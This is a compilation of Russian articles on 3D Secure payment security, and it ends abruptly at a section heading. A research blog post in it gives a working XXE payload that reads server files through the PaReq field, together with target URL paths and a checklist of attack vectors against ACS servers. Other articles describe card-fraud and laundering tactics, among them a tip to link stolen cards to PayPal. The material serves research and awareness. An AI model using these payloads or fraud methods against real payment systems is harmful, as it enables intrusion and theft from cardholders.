Хакеры рассказали в даркнете о методах обхода протокола 3D Secure

Хакеры рассказали в даркнете о методах обхода протокола 3D Secure

10:36 / 4 Марта, 20212021-03-04T11:36:21+03:00

Alexander Antipov

Обойти последний вариант функции безопасности можно, сочетая социальную инженерию с фишинговыми атаками.

Киберпреступники постоянно изучают новые способы обхода протокола 3D Secure (3DS), используемого для авторизации online-транзакций с использованием кредитных или дебетовых карт. Пользователи подпольных форумов предлагают советы о том, как обойти последний вариант функции безопасности, сочетая социальную инженерию с фишинговыми атаками.

Функция 3DS сильно изменилась в сравнении с первой версией, когда банк запрашивал у пользователя код или пароль для подтверждения транзакции. Во второй версии (3DS 2), разработанной для смартфонов, пользователи могут подтвердить свою покупку, авторизовавшись в банковском приложении с помощью биометрических данных (отпечаток пальца, распознавание лица). Несмотря на расширенные функции безопасности в 3DS 2, первая версия по-прежнему широко используется, предоставляя киберпреступникам возможность использовать свои навыки социальной инженерии, чтобы обманом заставить пользователей дать код или пароль для подтверждения транзакции.

Специалисты компании Gemini Advisory рассказали о некоторых методах, которыми киберпреступники делятся на форумах в даркнете, чтобы совершать мошеннические покупки в интернет-магазинах с поддержкой 3DS. Все начинается с получения доступа к полной информации о владельце карты, включая имя, номер телефона, адрес электронной почты, физический адрес, девичью фамилию матери, идентификационный номер и номер водительских прав. Киберпреступники используют эти данные, чтобы выдать себя за сотрудника банка, звонящего клиенту для подтверждения личности. С помощью полученной личной информации они завоевывают доверие жертвы и запрашивают ее пароль или код для завершения процесса.

Та же тактика может работать с более поздними версиями 3DS и делать покупки в режиме реального времени. Используя полную информацию о держателе карты, устройство смены голоса и приложение для подделки телефонного номера, мошенник может инициировать покупку на сайте, а затем позвонить жертве, чтобы получить необходимую информацию.

«На последнем этапе хакер сообщает жертве, что она получит код подтверждения для окончательной проверки личности, после чего киберпреступник оформляет заказ в магазине. Когда будет предложено ввести проверочный код, который был отправлен на телефон жертвы, мошенник сможет получить его от жертвы», — пояснили эксперты.

Получить код 3DS можно и другим способом, таким как фишинг. Когда жертва совершает покупку на фишинговом сайте, преступники передают все данные в легитимный магазин, чтобы получить свой продукт. По словам экспертов, некоторые киберпреступники также добавляют данные украденных кредитных карт в учетную запись PayPal и используют их в качестве способа оплаты.

Другой метод является «классическим» и включает в себя взлом телефона жертвы с помощью вредоносного ПО, которое может перехватить код безопасности и передать его мошеннику. Кроме того, многие магазины не запрашивают код 3DS, когда сумма транзакции ниже определенного лимита, что позволяет мошенникам совершать несколько небольших покупок.

на нашем Телеграм канале мы рассказываем о самых актуальных угрозах и событиях, которые оказывают влияние на обороноспособность стран, бизнес глобальных корпораций и безопасность пользователей по всему миру.

Поделиться новостью:

3D Secure, или что скрывают механизмы безопасности онлайн-платежей / Блог компании Digital Security / Хабр

Электронная коммерция — одна из самых больших и быстро растущих областей, в связи с чем она привлекает внимание как исследователей информационной безопасности, так и злоумышленников. Поэтому хотелось бы разобраться в некоторых аспектах механизмов безопасности, применяемых при проведении онлайн-платежей.

Один из протоколов, используемых для увеличения безопасности онлайн-платежей — 3D Secure. Это протокол, который был разработан на основе XML в качестве дополнительного уровня безопасности платежей, проводящихся без физического участия карты (card not present payment). VISA создала первую версию этого протокола, но вскоре его начали использовать и другие компании (Master Card, JCB International, AmEx, Мир), впоследствии объединившиеся с VISA в содружество EMV. EMV занимается поддержкой и развитием протокола 3DS.

Почему протокол 3D Secure называется именно так?

Полное название этого протокола — Three Domain Secure.

Первый домен — домен эмитента — это банк, выпустивший используемую карту.

Второй домен — домен эквайера — это банк и продавец, которому выплачиваются деньги.

Третий домен — домен совместимости (interoperability domain) — инфраструктура, используемая при оплате картой (кредитной, дебетовой, предоплаченной или другими типами платежных карт) для поддержки протокола 3D Secure. Он включает в себя Интернет, подключаемый модуль продавца (merchant plug-in), сервер контроля доступа (access control server) и других поставщиков программного обеспечения.

Зачем это нужно?

3D Secure обеспечивает новый уровень безопасности путем предоставления дополнительной информации.

Еще одним важным моментом является «перенос ответственности». Это означает, что в случае мошенничества вся ответственность ложится на банк-эмитент. Этот момент является очень важным для продавца (мерчанта), т.к. до появления 3D Secure урегулированием спорных вопросов приходилось заниматься мерчанту.

Также не стоит забывать о двух важных психологических аспектах: повышении доверия к онлайн-платежам и увеличении конверсии.

Конверсия может быть увеличена за счет обновлений протокола 3DS, направленных на сокращение взаимодействия с пользователем.

Версии протокола 3D Secure

v1.0 - 2001 г -…
v2.0 - 2014 г - Устарело
v2.1 - 2017 г
v2.2 - 2018 г

В настоящее время большинство платежных сервисов используют версию 1.0.2 при проведении онлайн CNP-платежей, запрашивающих OTP-код.

Версия 1.0.2 была создана в 2001 году и в ней есть некоторые проблемы.

На данный момент актуальной версией является v2.2, и EMV планирует, что к концу 2020-го года она будет использоваться везде.

Это основная схема, необходимая для понимания всего процесса платежа с использованием механизма 3DS.

На этом рисунке мы видим все три домена, используемые в протоколе, а также последовательность сообщений между всеми участниками платежной операции.

Как это работает?

Главное, что необходимо понять, — это то, что при использовании своей карты (виртуальной или реальной) для онлайн-оплаты, вы сталкиваетесь именно с протоколом 3DS. Поэтому сейчас мы проиллюстрируем все этапы совершения онлайн-платежа.

1 — Покупатель уже добавил все необходимые ему товары в корзину и нажал кнопку «Оплатить». В этот момент он попадает на страницу MPI-сервиса, где вводит данные своей карты.

После нажатия кнопки оплаты продавец (MPI) инициализирует старт платежного потока и, согласно протоколу, отправляет CRReq-запрос (Card Range Request). Данный запрос необходим, чтобы найти банк-эмитент вашей карты и получить CRR из домена взаимодействия. Этот запрос нас мало интересует.

После этого MPI отправляет VeReq (Verification Request). Этот запрос отправляется банку-эмитенту для проверки того, что 3DS для данной карты включен и карту можно использовать для оплаты.

VeRes (Verification Response) содержит дополнительную информацию для следующего этапа платежа.

Клиенты не могут видеть эти два типа сообщений.

2 — MPI создает PaReq (Payment Request) — запрос на оплату. Этот запрос отправляется через редирект в браузере клиента.

Итогом отправки PaReq становится отображение запроса на ввод OTP-кода.

3 — Клиент вводит OTP-код и возвращается на сайт продавца. Опять же в процессе этого через редирект от банка-эмитента к MPI передается PaRes (Payment Response), который содержит информацию о статусе проверки.

А поподробнее?

CRReq/CRRes для нас не очень важны. А вот VeReq/VeRes рассмотреть нужно.

<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message>
    <VEReq>
      <version>1.0.2</version>
      <pan>4444333322221111</pan>
      <Merchant>
        <acqBIN>411111</acqBIN>
        <merID>99000001</merID>
        <password>99000001</password>
      </Merchant>
      <Browser>
        <deviceCategory>0</deviceCategory>
        <accept>*/*</accept>
        <userAgent>curl/7.27.0</userAgent>
      </Browser>
    </VEReq>
  </Message>
</ThreeDSecure>

В VeReq самым важным параметром является идентификатор сообщения, информация о продавце и PAN карты.

<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message>
    <VERes>
      <version>1.0.2</version>
      <CH>
        <enrolled>Y</enrolled>
        <acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
      </CH>
      <url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
      <protocol>ThreeDSecure</protocol>
    </VERes>
  </Message>
</ThreeDSecure>

VeRes возвращает message id, который необходим, чтобы сопоставить запрос с этим ответом. А status enrolled показывает, что карта поддерживается.

Однако наиболее важным параметром в данном сообщении является URL-адрес. Этот параметр указывает, где находится ACS сервер эквайера и куда нужно отправить PaReq.

Pareq

Браузер клиента, совершающего оплату, может произвести достаточно много редиректов по различным компонентам, участвующим в совершении платежа. Так, в России есть некоторое количество запросов, обрабатывающихся на стороне Национальной Системы Платежных Карт. Но сегодня нас интересует только традиционный этап, описанный в спецификации протокола. А именно этап передачи PaReq.

URL: https://site.ru/acs/pareq

MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%shop.ru%2Fgates%2F3ds

Платежный запрос, содержащий PaReq (метод POST), имеет три параметра:

1) MD — данные продавца. Он нужен MPI, чтобы сопоставить PaReq и PaRes одной транзакции;

2) PaReq — параметр этого платежного запроса. Он содержит всю важную информацию о платеже;

3) TermUrl — URL-адрес, на который клиент будет возвращен в конце процесса аутентификации 3D Secure.

Параметры TermURL и MD всегда отражаются в ответе на данный запрос. Поэтому могут встречаться имплементации ACS, уязвимые к атакам типа reflected XSS. В процессе аудита различных систем такие сервера были найдены.

Важный момент №1: ACS сервера обрабатывают все входящие PaReq!

Что входит в параметр PaReq?

Вы можете получить его значение, раскодировав PaReq. Это сделать достаточно легко, потому что PaReq — это Xml-> zlib-> base64-> urlencode. Для упрощения работы с этими запросами был написан плагин для burp.

Теперь мы видим, что из себя на самом деле представляет PaReq, а именно сообщение формата xml. Это сообщение содержит информацию о сумме платежа (purchAmount, amount и currency), некоторую информацию о продавце и MessageId (из VeReq).

При отправке правильно сформированного PaReq (в большинстве случаев вам не нужен полный набор запросов на оплату — требуется отправить лишь PaReq, содержащий параметры правильного типа и длины), мы получим PaRes — ответ на платеж, подобный следующему:

Первая мысль, которая может прийти в голову веб-исследователю, который видит XML-запрос — это попробовать выполнить XXE. И это правильный путь!

Но для начала посмотрим на то, что случится, если отправить некорректно сформированный PaReq. Мы получим ошибку! Вот несколько примеров таких ошибок:

<ThreeDSecure><Message><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>

<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>

<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>

<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>

Ошибка может помочь получить дополнительную информацию о версии ACS. Некоторые из них могут также оказаться полезными для получения данных из XXE.

Раскрутим XXE

Рассмотрим следующий пример:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id=“123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>

acqBIN, merID, xid, date, purchAmount и currency отражаются в PaRes. Однако во всех реализациях ACS, которые мы нашли, удалось использовать только merID. Остальные параметры проверяются на соответствие типам данных.

Еще один интересный параметр (и наиболее полезный для атаки) — это URL. Этот параметр не отражается, но и не проверяется. Поэтому его можно использовать для эксплуатации XXE.

Вернемся к нашему примеру. В одной из реализаций ACS мы обнаружили, что можем читать короткие файлы, а также получать ответ в PaRes error через параметр merID. Таким образом, используя PaReq из примера выше, мы получали следующий ответ:

<ThreeDSecure><Message><PARes><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>

Тем не менее в большинстве случаев оставалось только использовать параметр URL для получения DNS или HTTP-запроса к нашему сервису. Другой вектор — это выполнить DOS через XXE-атаку «billion laughs» (проверялось на тестовом сервере).

Где это можно найти?

В ходе нашего исследования мы обнаружили несколько распространенных URL-адресов:

/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do

И распространенные имена поддоменов:

acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card

Впрочем, иногда вы можете найти и другие интересные пути.

Если вы хотите найти что-то новое, используйте proxy interceptor и записывайте процесс совершения платежей для интересующей вас платежной системы.

3D Secure v 2. *

Как мы писали ранее, в 3DS v1.0 есть некоторые проблемы.

Основная проблема в том, что покупатель может использовать множество разных типов устройств. Планшет, мобильный телефон, умные часы, умный чайник и т.д. Но сайт ACS не всегда разработан для взаимодействия со всеми типами устройств.

Для этого в 3DS 2.0 предусмотрели 3DS SDK.

Другая проблема состоит в том, что новый тип защиты требует дополнительного взаимодействия с клиентом. И этот момент влияет на конверсию. Решением проблемы конверсии стала возможность использования механизма управления рисками, который позволяет не заставлять пользователя вводить дополнительные секретные данные, если банк обладает достаточным количеством информации, подтверждающей личность клиента.

Следующий важный момент заключается в том, что технологии аутентификации развиваются. Соответственно, 3DS могла бы использовать не только OTP. Поэтому v2 задумывалась с возможностью расширения поддержки различных механизмов аутентификации.

Интересный факт про v1.0. Люди некоторых стран не доверяли этому протоколу, потому что видели редирект и думали, что это мошенничество!

Этот психологический момент послужил причиной изменения спецификации второй версии протокола для сокрытия момента перенаправления.

Как работает 3D Secure v2?

Начало потока платежей аналогично предыдущей версии. Клиент должен указать данные своей карты.

Первый и самый важный момент — это Risk Engine. В версии 1.0.2 клиенты всегда должны вводить второй фактор, например OTP. Однако в версии 2. * клиент может никогда не увидеть этот дополнительный защищенный запрос.

Особенности работы v2

Если вы посмотрите на схему потока платежей, вы увидите, что она похожа на предыдущую, но во 2-й версии больше этапов. Это происходит за счет добавления дополнительных аутентификационных запросов и механизма Risck Engine, который может совершать как один дополнительный запрос (при платеже через браузер), так и множество (используется 3DS SDK).

Условно, 2-ю версию можно разделить на два блока. Красный, где пользователь непосредственно влияет на передаваемую информацию, и желтый, где система сама собирает и передает информацию о пользователе.

А поподробнее?

AReq (base64url) расскажет все о вас и об устройстве, с которого совершена покупка.

Если вы задумаетесь о том, какой информацией о вас располагают рекламные агентства, то данные AReq вас не удивят. Но если вам кажется, что это плохо, рассмотрите следующий момент: банки знают все о ваших покупках и о вас. С этой точки зрения, некоторая дополнительная информация не так уж и плоха)

Это сообщение необходимо для работы системы управления рисками и упрощения покупок.

Если этой информации оказалось недостаточно, Risk Engine сперва попытается получить дополнительную информацию, и именно в этот момент клиент может получить OTP-запрос.

Что контролирует пользователь?

CReq (base64url json) — challenge request — сообщение, отправляемое браузером пользователя, в случае если ARes вернет сообщение о необходимости провести Challenge Flow.

{
"ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
"AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
"MessageType": "CReq",
"MessageVersion": "2.1.0",
"SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
"SdkCounterStoA": "001"
}

Если платежный процесс использует 3D Secure SDK, это сообщение будет зашифровано (JWE).

В CReq вы можете увидеть следующие поля:

К сожалению, нам пока не удалось провести достаточно подробное исследование 2-й версии протокола 3DS, поэтому сложно сказать, какие уязвимости встречаются чаще. Вы можете стать первым, кто опубликует исследование на данную тему.

Проблемы (найденные и возможные)

На что смотреть в v1

• XXE в параметре Pareq:
  • DOS
  • чтение файла
  • ssrf

• XSS в параметрах TermUrl
• Blind XSS — все параметры и заголовки попадают в систему мониторинга
• Pareq не подписан, но в нем есть цена! Отсюда может последовать атака уже на магазин, т.к. если на стороне магазина не будет проверки суммы подтвержденной операции, то вы сможете совершить покупку вещи стоимостью в 100р за 1р.

На что смотреть в v2

• Blind XSS — все параметры и заголовки попадают в систему мониторинга
• Challenge flow, главное его поймать…

Тем, кто подумывает обратить свой взгляд на платежные системы, я бы посоветовал остановиться еще и на сервисах, предоставляющих 3DS как SaaS. Там может оказаться еще достаточно много вещей, которые помогут вам понять, как устроен мир онлайн-платежей.

https://github.com/w3c/webpayments/wiki
https://www.EMV.com/emv-technologies/3d-secure/
https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html
https://github.com/webr0ck/3D-Secure-audit-cheatsheet

P.S. Возможно, вам пришел в голову вопрос: «Я пользовался AliExpress, Amazon, другое, и мне не приходил OTP код. Здесь использовался 3DS?» Нет, не использовался. Это как раз примеры тех случаев, когда магазин берет на себя ответственность за мошеннические операции.

Обход 3D Secure — анализ безопасности банковской защиты

Как выполнить такую операцию, как обход 3D Secure, и что это такое? С такой системой рано или поздно сталкиваются все люди, желающие что-либо купить в интернет-магазинах. Но насколько безопасна 3D Secure?

Чем является 3D Secure

3D Secure – это специализированный протокол защиты, который применяется пользователями банковских карт, чтобы платить за услуги через интернет. Благодаря технологии банки и продавцы могут быть защищены от действий мошенников. При этом система не гарантирует, что средства владельца карты останутся в сохранности.

Зная, что такое 3D Secure, можно хотя бы примерно понимать, как она работает. К примеру, вы заказали какой-то товар. Он был добавлен в «корзину». После этого обычно появляются всплывающие окна. На них пользователя попросят указать:

1. номер банковской карточки;
2. дату завершения срока действия;
3. ФИО владельца;
4. цифры с защитного кода.

Далее покупателя отправляют на страницу той кредитной компании, которая выпускала карту. Здесь пользователь вводит дополнительный код безопасности.

3D Secure от Сбербанка

Главный плюс защитной системы состоит в том, что вся вводимая человеком информация остается только на сервере банка. В магазин, в котором пользователь покупал какую-то вещь, эти данные не попадают. Второе преимущество – это использование одноразового кода, высылаемого банком для подтверждения аутентификации. Однако именно этот плюс может превратиться в значительный минус. При помощи специализированных программ или банальных вирусов мошенники способны перехватить такие данные. Для этого достаточно однажды случайно поставить любое зараженное приложение на телефон и личный компьютер. Есть и второй недостаток – не каждый интернет-магазин желает подключать для себя 3D Secure. Это не возбраняется и не преследуется по закону, так как система не является обязательной.

Обход 3D Secure

Как можно заметить, названные выше недостатки достаточно серьезны. Они известны большинству мошенников, поэтому опытные злоумышленники периодически их используют. Притом обходят систему защиты с поразительной легкостью. Проще всего это делать с интернет-магазинами, не подключенными к 3D Secure (на самом деле их много, а в некоторых магазинах эта технология отключена до определенной суммы). Даже начинающие хакеры порой без проблем воруют деньги с банковских карт пользователей из-за этого серьезного недостатка.

Но и продавцы не дремлют, так как им не хочется терять репутацию у своих клиентов. Для этого был придуман банальный, но при этом хитрый способ. Владелец интернет-магазина звонит в кредитную компанию с просьбой заблокировать определенную сумму на счете пользователя. После этого владелец банковской карты перезванивает в организацию и отвечает на ряд вопросов, чтобы пройти аутентификацию. Далее он называет количество заблокированных денег и сообщает об этом продавцу. Схема довольно неудобная, однако все-таки позволяет обезопасить средства на счете.

Присутствует и еще один довольно любопытный, но вполне стандартный вариант обхода 3D Secure. Называется он «человек в браузере». Владельцу компьютера незаметно для него присылается специальный вирус, который долгое время себя никак не проявляет. Именно поэтому многие антивирусные программы его не замечают. Вредоносное приложение аккуратно перехватывает данные и меняет их. Расчет идет на то, что человек ничего не увидит. Поэтому всегда нужно читать, что приходит в СМС от банка во время покупки или перевода средств.

Чтобы подобных проблем не возникало, старайтесь чаще полностью проверять на наличие вирусов свои компьютеры и другие гаджеты. Также не заходите на сомнительные сайты и ничего с них не скачивайте.

Ну и один из интереснейших советов по обходу этой технологии – использование платежных посредников, например, платежной системы PayPal. В «палке» достаточно подключить свою карту по известным данным, а при дальнейших платежах запросов специальных кодов больше не будет.

Загрузка…

Версия защиты: банки разрешили делать покупки в интернете без SMS-кода | Статьи

Россиянам, которые совершают покупки в интернете, больше не придется подтверждать каждую транзакцию кодом из SMS. Платежные системы и банки начали внедрять новый стандарт безопасности 3D-Secure 2.0, который квалифицирует часть операций как низкорисковые и не требует дополнительного верификации личности. Эту систему для карт «Мир» подключили уже 140 кредитных организаций, а остальные проходят сертификацию, рассказали «Известиям» в НСПК. В крупнейших банках сообщили, что новая технология вводится также для Visa и MasterCard. Эксперты отмечают, что об однозначном влиянии стандарта 3D-Secure 2.0 на безопасность платежей в Сети пока говорить некорректно.

Бесшовно и быстро

В число 140 банков, подключивших 3D-Secure 2.0 для «Мира», вошли Промсвязьбанк, Совкомбанк, УБРиР, крымский РНКБ, «Дом.РФ», банк «Восточный» и СКБ-банк, рассказали «Известиям» их представители. В Национальной системе платежных карт подчеркнули, что поддержка нового стандарта для эмитентов «Мир» обязательна.

Новый стандарт безопасности делает процесс бесшовным для клиента, сокращает долю отказов от операций, а также позволяет банкам экономить на СМС. 3D-Secure 2.0 даст возможность проводить аутентификацию и подтверждать операцию на основе анализа рисков без дополнительного обращения к держателю карты. Клиенту, в свою очередь, не придется вводить код из SMS от банка для совершения онлайн-покупки, отметили в пресс-службе платежной системы «Мир».

Фото: Depositphotos

— При этом сохраняется высокий уровень безопасности платежа. Кроме того, технология ориентирована на удобство и безопасность совершения платежей не только через web-браузер, но и непосредственно в приложениях различных сервисов в мобильном устройстве. В новой версии также реализована удобная поддержка аутентификации пользователей при оформлении регулярных платежей, подписок на различные сервисы, — рассказал представитель «Мира».

Промсвязьбанк, Совкомбанк и УБРиР уже внедрили новый стандарт безопасности и при оплате картами Visa и MasterCard. Над запуском технологии для международных платежных систем работают банки «Дом.РФ», «Восточный» и СКБ. В ВТБ, МКБ, «Альфе» и банке «Хоум Кредит» «Известиям» сообщили, что находятся в процессе реализации функционала для карт всех платежных систем. В Visa и MasterCard не ответили на запросы «Известий».

Совокупность сведений совместно с анализом транзакционной активности клиента дает возможность эмитенту «узнавать» своего держателя на этапе аутентификации и разрешать проведение операции без дополнительного подтверждения, оставаясь в защищенной среде протокола, объяснил принцип действия новой системы зампред правления банка «Зенит» Дмитрий Юрин.

Стандарт версии 2.0 позволяет проанализировать более 200 характеристик платежа, уточнил директор по мониторингу операций и диспутам Альфа-банка Алексей Голенищев. Среди них — точка продажи, сумма операции, позиции в чеке, геолокация и характеристики устройства, с которого совершается транзакция. Без дополнительных проверок будет проходить около 70–80% операций, оценил Алексей Голенищев.

Фото: РИА Новости/Григорий Сысоев

Кроме того, теперь банки смогут выбрать способ дополнительного подтверждения личности в случаях, когда это необходимо. В частности, появилась возможность использовать в качестве фактора аутентификации сохраненную на устройстве (например, на смартфоне) биометрию, подчеркнули в банке «Восточный».

Новый способ подтверждения личности удобен для клиента, поскольку ускоряет проведение операции. Также функционал повышает продажи и увеличивает объемы транзакций, отметил директор департамента платежных карт Промсвязьбанка Александр Петров. Стандарт версии 2.0. «упрощает клиентский путь и позволяет экономить на отправке одноразовых паролей», добавили в ВТБ.

20 лет спустя

Протокол безопасности нового уровня — это попытка найти разумный компромисс между безопасностью и удобством, считает директор по методологии и стандартизации Positive Technologies Дмитрий Кузнецов. С одной стороны, стандарт поддерживает несколько механизмов верификации плательщиков: наряду с паролями на усмотрение банка-эмитента могут использоваться биометрия и криптография. Но с другой, в некоторых регионах мира даже первая версия стандарта — с подтверждением только с помощью кода из SMS — привела к заметному снижению числа покупок. Дополнительное действие при проведении платежа оттолкнуло часть клиентов, которые предпочли менее защищенные площадки, пояснил Дмитрий Кузнецов.

По его словам, об однозначном влиянии нового стандарта на безопасность платежей говорить некорректно. Технология лишь делает меры защиты более гибкими, позволяя усиливать их для одних операций и ослаблять для других, подчеркнул эксперт Positive Technologies.

Фото: ИЗВЕСТИЯ/Дмитрий Коротаев

За несколько лет расходы банков на каждую СМС выросли примерно с 0,03 до 0,7–1 рубля за сообщение, отметил президент Национальной финансовой ассоциации Василий Заблоцкий. По его оценкам, благодаря внедрению 3D Secure 2.0. кредитные организации могут сэкономить до 30–80% расходов на SMS и направить сэкономленные средства на развитие бизнеса или в прибыль.

— Версия 3D-Secure 2.0 была создана более 20 лет назад — ее обновление назрело давно. Новая технология позволит банкам более эффективно бороться с мошенничеством, в частности — с попытками списания денежных средств хакерами с банковских карт при р2р-переводах. Злоумышленники уже научились обходить защитную систему предыдущего поколения, — подчеркнул Василий Заблоцкий.

После перехода на новый стандарт некоторых клиентов может удивить, что банк перестал присылать им коды с подтверждением при повторной покупке в интернет-магазине. Однако в итоге пользователи оценят удобство технологии, уверен эксперт.

Нет времени объяснять, блокируй карту! Четыре способа снять ваши деньги без подтверждения по СМС

Треть россиян в возрасте до 25 лет постоянно пользуются бесконтактными платежами, а 2% граждан страны вообще отказались от наличных, свидетельствуют данные «Левада-центра». Картой удобно расплачиваться в продуктовых и в транспорте, ее можно привязать к медиасервисам и такси, запланировать платежи по коммуналке. Но есть и оборотная сторона медали. О ней 66.RU рассказал Артем Трофимов, специалист по безопасности карт в банке для предпринимателей «Точка».

Как могут украсть деньги?

В банковской сфере есть понятие «скомпрометированная карта». Это карта, полный номер которой, код CVV2 или CVC2 и другие данные стали общедоступны или попали в руки мошенников. Этих данных может быть достаточно, чтобы банк предоставил доступ к вашим деньгам. Узнать о том, что карта скомпрометирована, практически невозможно, пока ею не воспользовались без вашего ведома.

Как это может произойти? Если мошенник знает номер карты и CVV2 или CVC2, он способен совершать операции в интернет-сервисах, которые не поддерживают или намеренно не используют технологию 3D-Secure. Проще говоря, не отправляют вам одноразовый пароль, чтобы подтвердить, что покупку оплачивает именно владелец карты, а не кто-то другой.

Проверять ли личность покупателя с помощью 3D-Secure или нет, решает онлайн-продавец, а не банк, выпустивший карту. Некоторые компании осознанно проводят часть операций без этой технологии, чтобы упростить покупки для клиентов.

Интернет-магазин AliExpress сознательно отказался от 3D-Secure. Первые несколько операций там будут подтверждаться одноразовым кодом. Когда в магазине убедятся, что учетная запись не мошенническая, вам позволят совершать сделки без 3D-Secure, чтобы покупатель не делал лишних движений и не передумал после того, как ему придет СМС с паролем для подтверждения операции. Таким образом, в AliExpress самостоятельно решают, когда использовать 3D-Secure, а когда нет.

AliExpress — лишь пример того, как можно оплачивать покупки без 3D-Secure, а не место, где реально воруют. Через него практически не крадут деньги.

Агрегаторы Uber и «Яндекс.Такси» тоже не используют 3D-Secure. Мы в «Точке» не видим всплеска мошенничества в Uber, по-моему, это разовые случаи в других банках. Схема, с помощью которой мошенники выводят деньги через сервис, может быть такой. Воры привязывают украденные реквизиты — номер карты и код к ней — к профилю пассажира. Затем создают виртуальный профиль таксиста и «оплачивают» его услуги украденной картой, то есть имитируют поездки, а потом получают возмещение реальными деньгами.

Мошенники крадут деньги у клиентов банков через Uber. Под угрозой счета даже тех, кто не пользуется такси

1. Мошенники регистрируют в сервисах Booking.com или Airbnb недвижимость, причем неважно, существует ли она, и «бронируют» ее у самих себя, оплачивая покупку с помощью ворованного номера и кода карты жертвы. Сервис бронирования переводит деньги на счет мошенникам.
2. Получить чужие средства можно через сервисы доставки еды. Киберворы регистрируют предприятие или договариваются с владельцем кафе, работающего с сервисами доставки, и оплачивают заказы картой жертвы. Курьер, который ничего не подозревает, выполняет заявку, а затем блюда возвращают обратно в общепит. И так по кругу.

Мошенники хотят получить деньги с карты, а не расплачиваться за услуги с помощью украденных данных. Тем более, Booking.com и Airbnb потребуют для такой оплаты документ, удостоверяющий личность. Поэтому найти того, кто жил за чужой счет, не составит труда.

Как защитить данные?

Бережно относиться к реквизитам карт и стараться не компрометировать их. Во-первых, пользуйтесь бесконтактной оплатой через Apple Pay, Google Pay, Samsung Pay и другие сервисы. Они меняют реквизиты пластиковой карты на виртуальные — токен. Токены помогают уберечь реквизиты от третьих лиц. Даже если информацию токена узнают, она будет бесполезна, потому что в каждой транзакции используются зашифрованные динамические данные. Не за горами использование таких же токенов и при оплатах в интернете по технологии EMV® Secure Remote Commerce.

Вот несколько способов скомпрометировать данные карты:

• Держать банковскую карту на виду, например, на рабочем столе. Или хранить ее в кошельке вместе с пин-кодом.
• Хвастаться картой с необычным дизайном в соцсетях, публиковать ее фото.
• Оплатить покупку на непроверенном поддельном ресурсе. Прежде чем вводить реквизиты, проверяйте данные магазина, свяжитесь с продавцом, почитайте отзывы в интернете, позвоните по указанному телефону и проверьте через 2ГИС, «Яндекс.Карты» или другой сервис, что за организации находятся по физическому адресу магазина.
• Оплатить доставку товара по письму от «продавца». Если вы договорились о покупке и продавец прислал ссылку на сайт доставки — внимательно изучите адрес страницы, куда вы перешли, найдите номер телефона доставки через поисковую систему и сверьте с сотрудником правильность адреса. Киберворы пользуются сайтами-дублерами, очень похожими на оригинальные, где оплата доставки или покупки — это перевод с карты на карту, не более.
• Сообщить номер карты и код «службе безопасности» банка. Если вам звонят из банка, обращаются по имени, называют последние операции и уверяют, что счет под угрозой — не верьте. Положите трубку, подумайте пять минут, вспомните новости об обманутых клиентах и перезвоните по номеру клиентской службы, указанному на обратной стороне банковской карты. Цифры нужно набрать самостоятельно.
• Делиться данными карты с другими людьми.

Если вы подозреваете, что карта скомпрометирована, сразу блокируйте ее с помощью звонка или письма в банк. После этого никто не сможет потратить деньги со счета, даже зная пин-код, CVV2 и другие данные.

Что делать, если деньги украли?

